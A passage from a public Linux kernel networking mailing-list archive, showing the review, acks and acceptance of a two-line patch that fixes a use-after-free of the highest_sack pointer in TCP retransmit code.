Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Cc: Yuchung Cheng <ycheng@google.com>
Cc: Neal Cardwell <ncardwell@google.com>
---
include/net/tcp.h | 2 ++
1 file changed, 2 insertions(+)
diff --git a/include/net/tcp.h b/include/net/tcp.h
index c00e7d51bb18..7717302cab91 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
{
if (sk->sk_send_head == skb_unlinked)
sk->sk_send_head = NULL;
+ if (tcp_sk(sk)->highest_sack == skb_unlinked)
+ tcp_sk(sk)->highest_sack = NULL;
}
static inline void tcp_init_send_head(struct sock *sk)
^ permalink raw reply related [flat|nested] 12+ messages in thread
* Re: [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
2016-08-17 12:56 ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
@ 2016-08-17 14:09 ` Neal Cardwell
2016-08-17 16:12 ` Cong Wang
2016-08-19 6:24 ` David Miller
2 siblings, 0 replies; 12+ messages in thread
From: Neal Cardwell @ 2016-08-17 14:09 UTC (permalink / raw)
To: Eric Dumazet
Cc: David Miller, Netdev, Marco Grassi, Yuchung Cheng, Greg KH,
Ilpo Järvinen
On Wed, Aug 17, 2016 at 8:56 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
>
> From: Eric Dumazet <edumazet@google.com>
>
> When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
> tail of the write queue using tcp_add_write_queue_tail()
>
> Then it attempts to copy user data into this fresh skb.
>
> If the copy fails, we undo the work and remove the fresh skb.
>
> Unfortunately, this undo lacks the change done to tp->highest_sack and
> we can leave a dangling pointer (to a freed skb)
>
> Later, tcp_xmit_retransmit_queue() can dereference this pointer and
> access freed memory. For regular kernels where memory is not unmapped,
> this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
> returning garbage instead of tp->snd_nxt, but with various debug
> features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
>
> This bug was found by Marco Grassi thanks to syzkaller.
>
> Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
> Reported-by: Marco Grassi <marco.gra@gmail.com>
> Signed-off-by: Eric Dumazet <edumazet@google.com>
> Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
> Cc: Yuchung Cheng <ycheng@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
Acked-by: Neal Cardwell <ncardwell@google.com>
Thanks, Eric.
neal
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
2016-08-17 12:56 ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
2016-08-17 14:09 ` Neal Cardwell
@ 2016-08-17 16:12 ` Cong Wang
2016-08-19 6:24 ` David Miller
2 siblings, 0 replies; 12+ messages in thread
From: Cong Wang @ 2016-08-17 16:12 UTC (permalink / raw)
To: Eric Dumazet
Cc: David Miller, Linux Kernel Network Developers, Marco Grassi,
Yuchung Cheng, Neal Cardwell, Greg KH, Ilpo Järvinen
On Wed, Aug 17, 2016 at 5:56 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> From: Eric Dumazet <edumazet@google.com>
>
> When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
> tail of the write queue using tcp_add_write_queue_tail()
>
> Then it attempts to copy user data into this fresh skb.
>
> If the copy fails, we undo the work and remove the fresh skb.
>
> Unfortunately, this undo lacks the change done to tp->highest_sack and
> we can leave a dangling pointer (to a freed skb)
>
> Later, tcp_xmit_retransmit_queue() can dereference this pointer and
> access freed memory. For regular kernels where memory is not unmapped,
> this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
> returning garbage instead of tp->snd_nxt, but with various debug
> features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
>
> This bug was found by Marco Grassi thanks to syzkaller.
>
> Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
> Reported-by: Marco Grassi <marco.gra@gmail.com>
> Signed-off-by: Eric Dumazet <edumazet@google.com>
> Cc: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
> Cc: Yuchung Cheng <ycheng@google.com>
> Cc: Neal Cardwell <ncardwell@google.com>
> ---
> include/net/tcp.h | 2 ++
> 1 file changed, 2 insertions(+)
>
> diff --git a/include/net/tcp.h b/include/net/tcp.h
> index c00e7d51bb18..7717302cab91 100644
> --- a/include/net/tcp.h
> +++ b/include/net/tcp.h
> @@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
> {
> if (sk->sk_send_head == skb_unlinked)
> sk->sk_send_head = NULL;
> + if (tcp_sk(sk)->highest_sack == skb_unlinked)
> + tcp_sk(sk)->highest_sack = NULL;
> }
>
Nit: the function name probably needs to change too, since it now
checks more than just send_head. ;) But we can always do this
for net-next, don't let this be a blocker for this security fix.
Reviewed-by: Cong Wang <xiyou.wangcong@gmail.com>
Thanks!
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
2016-08-17 12:56 ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
2016-08-17 14:09 ` Neal Cardwell
2016-08-17 16:12 ` Cong Wang
@ 2016-08-19 6:24 ` David Miller
2 siblings, 0 replies; 12+ messages in thread
From: David Miller @ 2016-08-19 6:24 UTC (permalink / raw)
To: eric.dumazet; +Cc: netdev, marco.gra, ycheng, ncardwell, gregkh, ilpo.jarvinen
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 17 Aug 2016 05:56:26 -0700
> From: Eric Dumazet <edumazet@google.com>
>
> When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
> tail of the write queue using tcp_add_write_queue_tail()
>
> Then it attempts to copy user data into this fresh skb.
>
> If the copy fails, we undo the work and remove the fresh skb.
>
> Unfortunately, this undo lacks the change done to tp->highest_sack and
> we can leave a dangling pointer (to a freed skb)
>
> Later, tcp_xmit_retransmit_queue() can dereference this pointer and
> access freed memory. For regular kernels where memory is not unmapped,
> this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
> returning garbage instead of tp->snd_nxt, but with various debug
> features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
>
> This bug was found by Marco Grassi thanks to syzkaller.
>
> Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
> Reported-by: Marco Grassi <marco.gra@gmail.com>
> Signed-off-by: Eric Dumazet <edumazet@google.com>
Applied and queued up for -stable.
^ permalink raw reply [flat|nested] 12+ messages in thread
end of thread, other threads:[~2016-08-19 6:33 UTC | newest]
Thread overview: 12+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2016-08-16 10:45 Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master] Greg KH
2016-08-16 15:39 ` Eric Dumazet
2016-08-16 18:39 ` Eric Dumazet
2016-08-16 20:19 ` Cong Wang
2016-08-16 20:27 ` Eric Dumazet
2016-08-16 20:31 ` Eric Dumazet
2016-08-16 20:32 ` Cong Wang
2016-08-17 11:10 ` Marco Grassi
2016-08-17 12:56 ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
2016-08-17 14:09 ` Neal Cardwell
2016-08-17 16:12 ` Cong Wang
2016-08-19 6:24 ` David Miller
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.